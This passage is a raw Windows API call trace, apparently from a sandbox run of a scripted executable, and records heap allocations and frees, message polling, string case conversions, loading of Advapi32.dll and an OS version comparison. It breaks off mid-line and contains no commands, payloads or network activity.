[0251.386] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.386] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.386] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.386] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.386] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.386] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.387] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.387] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.387] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.388] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.388] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.388] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0251.389] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.389] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0251.390] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.390] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.390] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.391] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.392] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.392] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.392] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0251.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.393] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.394] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.394] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.394] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.394] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.394] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: 